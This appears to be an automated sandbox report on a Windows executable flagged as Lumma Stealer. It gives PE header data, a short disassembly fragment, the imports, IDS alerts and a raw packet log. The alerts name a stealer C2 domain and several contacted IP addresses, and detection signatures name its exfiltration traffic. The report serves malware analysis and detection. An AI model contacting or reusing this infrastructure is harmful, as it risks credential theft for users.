                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:3b02806246eee5fe2c774a0312bca63c
                                                                                                  Instruction
                                                                                                  call 00007F21C04D0C98h
                                                                                                  jmp 00007F21C04CD65Eh
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push edi
                                                                                                  mov edi, 000003E8h
                                                                                                  push edi
                                                                                                  call dword ptr [004010ACh]
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call dword ptr [004010A8h]
                                                                                                  add edi, 000003E8h
                                                                                                  cmp edi, 0000EA60h
                                                                                                  jnbe 00007F21C04CD7E6h
                                                                                                  test eax, eax
                                                                                                  je 00007F21C04CD7C0h
                                                                                                  pop edi
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  call 00007F21C04CDF29h
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call 00007F21C04CDD76h
                                                                                                  push dword ptr [00450014h]
                                                                                                  call 00007F21C04CE8F1h
                                                                                                  push 000000FFh
                                                                                                  call eax
                                                                                                  add esp, 0Ch
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push 00401260h
                                                                                                  call dword ptr [004010A8h]
                                                                                                  test eax, eax
                                                                                                  je 00007F21C04CD7F7h
                                                                                                  push 00401250h
                                                                                                  push eax
                                                                                                  call dword ptr [0040105Ch]
                                                                                                  test eax, eax
                                                                                                  je 00007F21C04CD7E7h
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call eax
                                                                                                  pop ebp
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call 00007F21C04CD7ADh
                                                                                                  pop ecx
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  call dword ptr [004010B0h]
                                                                                                  int3
                                                                                                  push 00000008h
                                                                                                  call 00007F21C04D0E02h
                                                                                                  pop ecx
                                                                                                  ret
                                                                                                  push 00000008h
                                                                                                  call 00007F21C04D0D1Fh
                                                                                                  pop ecx
                                                                                                  ret
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, eax
                                                                                                  jmp 00007F21C04CD7EDh
                                                                                                  mov eax, dword ptr [esi]
                                                                                                  test eax, eax
                                                                                                  je 00007F21C04CD7E4h
                                                                                                  Programming Language:
                                                                                                  • [C++] VS2008 build 21022
                                                                                                  • [ASM] VS2008 build 21022
                                                                                                  • [ C ] VS2008 build 21022
                                                                                                  • [IMP] VS2005 build 50727
                                                                                                  • [RES] VS2008 build 21022
                                                                                                  • [LNK] VS2008 build 21022
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4e81c0x50.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5b0000x6fd0.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d780x40.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x194.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x4e1520x4e200791cffbf50942189bea294af97f26f78False0.903175data7.870521705718039IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .data0x500000xac9c0x60008b669612194501e856229831d9b1ef5eFalse0.08011881510416667data0.9619270276382371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x5b0000xcfd00x70006ff93c09a762cb3cd5986d75bc2d9329False0.7521623883928571data6.510646801042637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_CURSOR0x612800x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                                  RT_CURSOR0x615b00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                                  RT_ICON0x5b3900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRomanianRomania0.8232942430703625
                                                                                                  RT_ICON0x5c2380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRomanianRomania0.8614620938628159
                                                                                                  RT_ICON0x5cae00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRomanianRomania0.8317972350230415
                                                                                                  RT_ICON0x5d1a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRomanianRomania0.7095375722543352
                                                                                                  RT_ICON0x5d7100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216RomanianRomania0.8035269709543569
                                                                                                  RT_ICON0x5fcb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096RomanianRomania0.8311444652908068
                                                                                                  RT_ICON0x60d600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024RomanianRomania0.8590425531914894
                                                                                                  RT_STRING0x619280x3ceAmigaOS bitmap font "i", fc_YSize 30720, 19456 elements, 2nd "f", 3rd "v"RomanianRomania0.4650924024640657
                                                                                                  RT_STRING0x61cf80x2d2dataRomanianRomania0.4806094182825485
                                                                                                  RT_ACCELERATOR0x612300x50dataRomanianRomania0.8125
                                                                                                  RT_GROUP_CURSOR0x616e00x22data1.0294117647058822
                                                                                                  RT_GROUP_ICON0x611c80x68dataRomanianRomania0.6826923076923077
                                                                                                  RT_VERSION0x617080x21cdata0.5166666666666667
                                                                                                  DLLImport
                                                                                                  KERNEL32.dllSetLocaleInfoA, EnumCalendarInfoA, WriteConsoleInputW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, SetComputerNameW, FreeEnvironmentStringsA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommConfig, SwitchToFiber, ReadConsoleInputA, GetAtomNameW, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, OpenEventA, FindNextFileA, EnumDateFormatsA, GetModuleHandleA, GetVersionExA, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, HeapFree, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, SetStdHandle, RaiseException, GetLocaleInfoA, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CloseHandle
                                                                                                  USER32.dllOemToCharA, DdeQueryStringA, GetWindowTextLengthA
                                                                                                  SHELL32.dllDragQueryPoint
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  RomanianRomania
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-05T08:59:20.114170+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704104.21.56.70443TCP
                                                                                                  2025-01-05T08:59:21.449770+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705176.113.115.1980TCP
                                                                                                  2025-01-05T08:59:23.033188+01002058606ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)1192.168.2.5624221.1.1.153UDP
                                                                                                  2025-01-05T08:59:23.522302+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.549706104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:23.522302+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:23.982370+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549706104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:23.982370+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:24.467441+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.549707104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:24.467441+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:24.977044+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549707104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:24.977044+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:25.771541+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.549708104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:25.771541+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:27.378894+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.549709104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:27.378894+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:28.098986+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:28.790526+01002058607ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)1192.168.2.549710104.21.112.1443TCP
                                                                                                  2025-01-05T08:59:28.790526+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.112.1443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 5, 2025 08:59:19.225219011 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:19.225284100 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:19.225383043 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:19.233891010 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:19.233913898 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:19.724580050 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:19.724724054 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:19.811214924 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:19.811250925 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:19.811634064 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:19.811685085 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:19.817322969 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:19.863327026 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:20.113945007 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:20.114027977 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:20.114032030 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:20.114075899 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:20.145466089 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:20.145487070 CET44349704104.21.56.70192.168.2.5
                                                                                                  Jan 5, 2025 08:59:20.145618916 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:20.145618916 CET49704443192.168.2.5104.21.56.70
                                                                                                  Jan 5, 2025 08:59:20.759412050 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:20.764477968 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:20.764548063 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:20.770675898 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:20.775554895 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449681997 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449707985 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449724913 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449732065 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449738979 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449749947 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449763060 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449769974 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.449773073 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449784994 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449790001 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.449814081 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.449829102 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.454617977 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.454641104 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.454677105 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.454695940 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.454847097 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.454857111 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.454895973 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.571219921 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571257114 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571274042 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571284056 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571336985 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.571363926 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.571388960 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571424961 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.571434975 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571470976 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.571638107 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571654081 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571664095 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.571691990 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.571713924 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.572099924 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572110891 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572123051 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572133064 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572144032 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572146893 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.572165012 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.572191954 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.572886944 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572896957 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572909117 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572920084 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572930098 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572941065 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.572942972 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.573007107 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.573843956 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.573853970 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.573864937 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.573880911 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.573896885 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.573910952 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.573930025 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.576153994 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.576165915 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.576175928 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.576211929 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.576225996 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.658377886 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.658539057 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.692877054 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.692888975 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693085909 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693156958 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693167925 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693180084 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693190098 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693206072 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693207979 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693237066 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693253040 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693254948 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693264961 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693268061 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693275928 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693285942 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693293095 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693320036 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693658113 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693675041 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693686008 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693696022 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693706989 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693711042 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693717957 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693727970 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693728924 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.693744898 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.693756104 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694088936 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694099903 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694109917 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694119930 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694130898 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694149017 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694170952 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694289923 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694299936 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694310904 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694333076 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694345951 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694428921 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694438934 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694449902 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694461107 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694470882 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694470882 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694482088 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694493055 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694503069 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694504976 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694514036 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694519043 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694525003 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694534063 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694536924 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.694559097 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.694580078 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.695426941 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695441961 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695452929 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695462942 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695473909 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.695473909 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695483923 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695494890 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695497990 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.695504904 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695517063 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695517063 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.695528030 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.695539951 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.695569038 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.698402882 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.698412895 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.698451996 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.745109081 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.745121956 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.745265961 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.814682961 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814698935 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814781904 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.814841986 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814851999 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814862013 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814872980 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814877033 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.814883947 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814894915 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814901114 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814904928 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.814910889 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814917088 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.814951897 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.814968109 CET4970580192.168.2.5176.113.115.19
                                                                                                  Jan 5, 2025 08:59:21.815143108 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815160036 CET8049705176.113.115.19192.168.2.5
                                                                                                  Jan 5, 2025 08:59:21.815170050 CET8049705176.113.115.19192.168.2.5
